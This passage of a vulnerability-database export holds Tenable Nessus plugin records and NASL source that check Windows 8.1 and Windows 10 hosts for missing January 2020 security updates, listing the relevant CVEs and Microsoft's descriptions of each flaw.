File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. 
(CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-0644)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534297/windows-8-1-kb4534297\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4534309/windows-8-1-kb4534309\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534309 or Cumulative Update KB4534297.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534297', '4534309');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534297, 4534309])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-27T10:29:16", "description": "The remote Windows host is missing security update 4534306.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. 
An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. 
(CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the user's system. (CVE-2020-0622)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. 
(CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)", "edition": 9, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534306: Windows 10 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534306.NASL", "href": "https://www.tenable.com/plugins/nessus/132865", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132865);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534306\");\n script_xref(name:\"MSFT\", value:\"MS20-4534306\");\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n\n script_name(english:\"KB4534306: Windows 10 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534306.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. 
An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. 
An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. 
An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534306/windows-10-update-kb4534306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fd98f0c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534306.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534306');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534306])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-31T20:43:39", "description": "The remote Windows host is missing security update 
4534276.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. 
(CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the user's system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. 
(CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. 
An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. 
(CVE-2020-0601)", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534276: Windows 10 Version 1709 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534276.NASL", "href": "https://www.tenable.com/plugins/nessus/132860", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132860);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/27\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534276\");\n script_xref(name:\"MSFT\", value:\"MS20-4534276\");\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n\n script_name(english:\"KB4534276: Windows 10 Version 1709 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534276.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
